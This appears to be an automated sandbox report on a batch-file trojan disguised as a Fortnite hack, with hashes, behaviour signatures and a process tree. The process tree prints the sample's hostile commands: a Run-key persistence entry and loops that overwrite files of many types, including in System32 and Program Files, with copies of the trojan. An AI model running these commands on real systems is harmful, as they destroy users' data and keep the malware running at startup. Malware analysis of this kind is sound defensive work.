Resubmissions

12/03/2025, 21:28

250312-1bn3yatwgv 10

12/03/2025, 21:24

250312-z9fzjsvpx2 10

12/03/2025, 21:22

250312-z8by7stvf1 6

12/03/2025, 21:20

250312-z63n5stvb1 7

11/03/2025, 00:00

250311-aaawtasr13 5

10/03/2025, 21:57

250310-1t6eyazlx6 10

09/03/2025, 01:58

250309-cdv29swybs 10

08/03/2025, 06:55

250308-hp35xatjt9 10

08/03/2025, 04:53

250308-fh1ebssky5 10

Analysis

  • max time kernel
    504s
  • max time network
    445s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250217-en
  • resource tags

    arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    10/03/2025, 21:57

General

  • Target

    My-Skidded-malwares-main/Trojan.Bat.FortniteHackz.bat

  • Size

    34KB

  • MD5

    ac04b6f6fa293c4b55c4c8b49372a9ec

  • SHA1

    9dfca519218c3c10203163454f1237916b0655cc

  • SHA256

    273f4b1732968174b95b549e1fec0b61181404b820a0d8f1b8dec9c32686bd92

  • SHA512

    b560feee161c2300b3145026dd5faa0ca3b4edbcaa88a8d68854d26b0c1a6087370af5da707b2fb61c5ca0b363a5786f5e7eeba2ed1fe5ae863347f018889086

  • SSDEEP

    192:9TIqVppLuLpDq7QYfLGMV+jasHHLgLxLR44444444444444444M666666666666Q:9rVppLuLpDq7QYfLGMV+jasHHLgLxi

Malware Config

Signatures

  • Drops file in Drivers directory 4 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 64 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Modifies registry class 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:5060
    • C:\Windows\system32\reg.exe
      reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_89_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat /f
      2⤵
      • Adds Run key to start application
      PID:2168
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y "
      2⤵
        PID:1444
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_doc.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
        2⤵
          PID:1532
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y "
          2⤵
            PID:2256
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_lnk.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
            2⤵
              PID:4884
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y "
              2⤵
                PID:3628
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                2⤵
                  PID:4004
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                  2⤵
                    PID:3124
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                    2⤵
                    • Drops file in Drivers directory
                    • Drops file in System32 directory
                    • Drops file in Program Files directory
                    PID:4468
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                    2⤵
                      PID:5020
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                      2⤵
                        PID:3840
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                        2⤵
                          PID:1380
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_exe.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                          2⤵
                          • Drops file in System32 directory
                          • Drops file in Program Files directory
                          • Drops file in Windows directory
                          PID:4936
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                          2⤵
                            PID:416
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                            2⤵
                              PID:3188
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                              2⤵
                                PID:1592
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                2⤵
                                • Drops file in System32 directory
                                • Drops file in Program Files directory
                                • Drops file in Windows directory
                                PID:2792
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                                2⤵
                                  PID:5012
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                  2⤵
                                  • Drops file in System32 directory
                                  • Drops file in Program Files directory
                                  • Drops file in Windows directory
                                  PID:2392
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                                  2⤵
                                    PID:4784
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                    2⤵
                                    • Drops file in System32 directory
                                    • Drops file in Program Files directory
                                    • Drops file in Windows directory
                                    PID:3984
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                                    2⤵
                                      PID:3568
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                      2⤵
                                      • Drops file in System32 directory
                                      • Drops file in Program Files directory
                                      • Drops file in Windows directory
                                      PID:2368
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                                      2⤵
                                        PID:1364
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                        2⤵
                                        • Drops file in System32 directory
                                        • Drops file in Program Files directory
                                        • Drops file in Windows directory
                                        PID:2788
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                                        2⤵
                                          PID:3716
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                          2⤵
                                          • Drops file in System32 directory
                                          • Drops file in Windows directory
                                          PID:3160
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                                          2⤵
                                            PID:1140
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                            2⤵
                                            • Drops file in Program Files directory
                                            • Drops file in Windows directory
                                            PID:3904
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                                            2⤵
                                              PID:2252
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                              2⤵
                                              • Drops file in System32 directory
                                              • Drops file in Program Files directory
                                              • Drops file in Windows directory
                                              PID:3176
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                                              2⤵
                                                PID:2148
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                                2⤵
                                                • Drops file in Program Files directory
                                                • Drops file in Windows directory
                                                PID:572
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                                                2⤵
                                                  PID:3576
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                                  2⤵
                                                  • Drops file in System32 directory
                                                  • Drops file in Program Files directory
                                                  • Drops file in Windows directory
                                                  PID:1944
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                                                  2⤵
                                                    PID:4516
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                                    2⤵
                                                      PID:3400
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                                                      2⤵
                                                        PID:3160
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                                        2⤵
                                                          PID:2340
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                                                          2⤵
                                                            PID:948
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_.pp.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                                            2⤵
                                                              PID:1600
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                                                              2⤵
                                                                PID:1336
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_.dll.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                                                2⤵
                                                                  PID:4808
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                                                                  2⤵
                                                                    PID:4568
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_.sys.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                                                    2⤵
                                                                      PID:4416
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                                                                      2⤵
                                                                        PID:3496
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_.vbs.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                                                        2⤵
                                                                          PID:2244
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                                                                          2⤵
                                                                            PID:1972
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_.rar.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                                                            2⤵
                                                                              PID:1760
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                                                                              2⤵
                                                                                PID:1648
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_.jar.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                                                                2⤵
                                                                                  PID:3100
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                                                                                  2⤵
                                                                                    PID:112
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_.virus.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                                                                    2⤵
                                                                                      PID:3872
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                                                                                      2⤵
                                                                                        PID:1744
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_.vir.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                                                                        2⤵
                                                                                          PID:3572
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                                                                                          2⤵
                                                                                            PID:4852
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_.iso.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                                                                            2⤵
                                                                                              PID:1764
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                                                                                              2⤵
                                                                                                PID:5008
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_.bat.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                                                                                2⤵
                                                                                                  PID:2924

                                                                                              Network

                                                                                              MITRE ATT&CK Enterprise v15

                                                                                              Replay Monitor

                                                                                              Loading Replay Monitor...

                                                                                              Downloads

                                                                                              • C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Marquee.xml

                                                                                                Filesize

                                                                                                34KB

                                                                                                MD5

                                                                                                4a812cb3bddc8bd1d63252fb8c483b9b

                                                                                                SHA1

                                                                                                7afeabf10ba2994cd8a69cd6ce0d574e9c78d797

                                                                                                SHA256

                                                                                                7deab1b703f5b0a5276ebc7b6c6431754f48608b514af206a2d235bf873a585a

                                                                                                SHA512

                                                                                                8917df6652689e936a55082fe8ace70c415c482a3ece37890c54933ec351e355152ec234fcace948003455ac05c987933f8882cd0e925efb6a602160529d6cc1

                                                                                              • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_doc.txt

                                                                                                Filesize

                                                                                                937B

                                                                                                MD5

                                                                                                0aa44cda93a001e3159c95b4f5d5e481

                                                                                                SHA1

                                                                                                f92aa6e99d17c2681a8d19f5d7d99cfa4f9dd23b

                                                                                                SHA256

                                                                                                219d9382397806c8ba684e355bdc92f32c4ddcaa06bd8a91cfac3df3b7df1275

                                                                                                SHA512

                                                                                                43f9d6e116f2f556b1911b359b2b1e981ab63affbb0355b42bc87003ef2944f5407caad34d33410f0a03eb4edaa20a9ef6eac2180a84647cd2954744cef5530b

                                                                                              • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_exe.txt

                                                                                                Filesize

                                                                                                428KB

                                                                                                MD5

                                                                                                48d30ed7e4f2085bfc976067e1216fd6

                                                                                                SHA1

                                                                                                b76740cb115f7a7ee0428346bcc68b4ba1c6f3fc

                                                                                                SHA256

                                                                                                98ba345b2a6e0274360b29588f06879e21f0aafe193e5132b25316fcfdee3aa6

                                                                                                SHA512

                                                                                                f70874aa074f8458d7e6f26f676a6b86e0f5a8f236ad43bdd4ec6b9f95ce4258961b294a90b1add55323bdf037e46e63fa9f53da11f662e1f1eb17ba6bc1af89

                                                                                              • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_lnk.txt

                                                                                                Filesize

                                                                                                37KB

                                                                                                MD5

                                                                                                3216f011f742e4a27a3f2d00a01502b7

                                                                                                SHA1

                                                                                                844fff5affdb273b62e7e03ae5de837f1d4b6cdf

                                                                                                SHA256

                                                                                                c338125f2d669907338d01dfbb172dddc843bec3aa0f5bbd516a7acd2474eb61

                                                                                                SHA512

                                                                                                f70fc26909f5669d7c97710939012bda47ba0668ff20d8f9a00cd8d80666d69d5c8b2000e455305923e8d7a4aaebec354273e09839339d09e0b242e00cba7960

                                                                                              • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_mp4.txt

                                                                                                Filesize

                                                                                                968B

                                                                                                MD5

                                                                                                16b179bfca89bcf8ee6156f9f8119657

                                                                                                SHA1

                                                                                                9abee27342e2fd0ce4527fa840b8e330a269cb24

                                                                                                SHA256

                                                                                                4ee95f94e19146f63a2b5cd27a107dfc7ad4ca24ca153adbe98c8a63e3d58b30

                                                                                                SHA512

                                                                                                c37b7e216101c64e87386ffdb3a2e5347d9e6cf351463ef9d9959da3b923da27b8667e64128408bd71552735b056de1bc2573c0161fd9c8292910eecfd61b6e8

                                                                                              • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_pdf.txt

                                                                                                Filesize

                                                                                                2KB

                                                                                                MD5

                                                                                                ee8b51f59d8ef1b91e315bac9d1b8d80

                                                                                                SHA1

                                                                                                18c805d970b45639ef60db255b3cde69f280b7c8

                                                                                                SHA256

                                                                                                392b2cdf03763ff1f019968355fa8788f76857acf06ba97e27d0ebdb95577c1f

                                                                                                SHA512

                                                                                                bc35d12a82419b8a43efac43f3a6667dc342777e75603ec210806fab410eaa51a79cfa4a3164865ff316db9627065339dcd1c79f1596546584b2f6227c0330bd

                                                                                              • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_png.txt

                                                                                                Filesize

                                                                                                2.1MB

                                                                                                MD5

                                                                                                fe25d5d8429e83a4c20ca537313ac762

                                                                                                SHA1

                                                                                                9175934190797d7d4b36c15a3fa0f7783dadd0c4

                                                                                                SHA256

                                                                                                bb795eca8aec1b04df712f5705b2071b168de3bfe75cdd4192d57727d473aa1a

                                                                                                SHA512

                                                                                                76300d7b071b8b2fba75532c25065b7f145d0da38cf47f2321d708593ba24fe288eef30c0f5032b4dea93ade5367339381c410bf954d2704e7b3a81254845dd5

                                                                                              • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_txt.txt

                                                                                                Filesize

                                                                                                35KB

                                                                                                MD5

                                                                                                734cdd6fad466403b9e3d7af644aace4

                                                                                                SHA1

                                                                                                05c33a2fd9e803395c26229ccd7b19849cb5dbfc

                                                                                                SHA256

                                                                                                74962d776aebabd82a91d76918b8a36582ec08a15d308c7595d64f01db116178

                                                                                                SHA512

                                                                                                ba8794f56f6dafe09b8062011995676720c85341d31776478e883a8a59373ca15a3b8f833dee461152aa9db3772d9eb6803b1c55c0f92370682ab2c5e2a8e158

                                                                                              • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_xml.txt

                                                                                                Filesize

                                                                                                1.6MB

                                                                                                MD5

                                                                                                c3ad0fbac6e57eda6b6f6762c81657ad

                                                                                                SHA1

                                                                                                c63641d27b0df01f61941518bbb78f254d70487c

                                                                                                SHA256

                                                                                                0d8ea0701f679f95eb4db6992f9b97c5b38b8037d24aa9593e1db4424333a127

                                                                                                SHA512

                                                                                                abe8d0a90e99b21d50d6363fee23a3b677887f2e0b3a259ca3ee128fc46d017d243f03cf161d5a90979b6081f483fdf22148270f5c31f21ef59a2e46239e3023

                                                                                              • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_xml.txt

                                                                                                Filesize

                                                                                                328KB

                                                                                                MD5

                                                                                                26b85df6fe0e1c7bcf6b2a80f425801e

                                                                                                SHA1

                                                                                                ebe663a41f6897cb6f05ed5b50f6b375a4c4646e

                                                                                                SHA256

                                                                                                07c0fcc8822dd914cba92ab41ab3dee6ea88299a64c198f72d24838b33337b62

                                                                                                SHA512

                                                                                                56e3032d0e1af70914bb2bec9ff5d17d4ea47cf3a87d881d05d115cb0ca680f3c52a95ddfa5bf2ba7e9d166ba53940ded0d57a7a168b8a2f1e1a7e457150e525

                                                                                              • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_xml.txt

                                                                                                Filesize

                                                                                                657KB

                                                                                                MD5

                                                                                                aa41bb94c1891d08c0195e9169b7a201

                                                                                                SHA1

                                                                                                5e32ba2b3b7e62ece80ae57590c219de9326a578

                                                                                                SHA256

                                                                                                eedc12e8c72f1e1787ef0368b1e76eda34422db28521ab8cbb60a7846873cb3c

                                                                                                SHA512

                                                                                                f778e3b13605ab1a7a9d7f5f8d188d1fdc9bfd6e4f8731463dd997d8f64a5b4d5757399a68b3f65fe324520b2d43c5991d5eb0d67633a31f7596ce22afd88acc

                                                                                              • C:\Users\Admin\Desktop\ConvertFromSubmit.docm

                                                                                                Filesize

                                                                                                34KB

                                                                                                MD5

                                                                                                ac04b6f6fa293c4b55c4c8b49372a9ec

                                                                                                SHA1

                                                                                                9dfca519218c3c10203163454f1237916b0655cc

                                                                                                SHA256

                                                                                                273f4b1732968174b95b549e1fec0b61181404b820a0d8f1b8dec9c32686bd92

                                                                                                SHA512

                                                                                                b560feee161c2300b3145026dd5faa0ca3b4edbcaa88a8d68854d26b0c1a6087370af5da707b2fb61c5ca0b363a5786f5e7eeba2ed1fe5ae863347f018889086

                                                                                              • C:\mail.vbs

                                                                                                Filesize

                                                                                                626B

                                                                                                MD5

                                                                                                faf26be18051cb2a6b9f494709d6f64f

                                                                                                SHA1

                                                                                                ddaaa2342fa04be74cc81e4a4206274d7a9e8d77

                                                                                                SHA256

                                                                                                cae83c07da4e807331b117e25f122c460234aec3598c7b7739d12de76f3445ff

                                                                                                SHA512

                                                                                                d19eac8ed2f1f353fe3dfa9113542be8e2593f3f17be17cfa90dbfab164125f05d7f59e89afd5680ad7044d1e867b130567c934e7132ac79eda79eaafd7ef272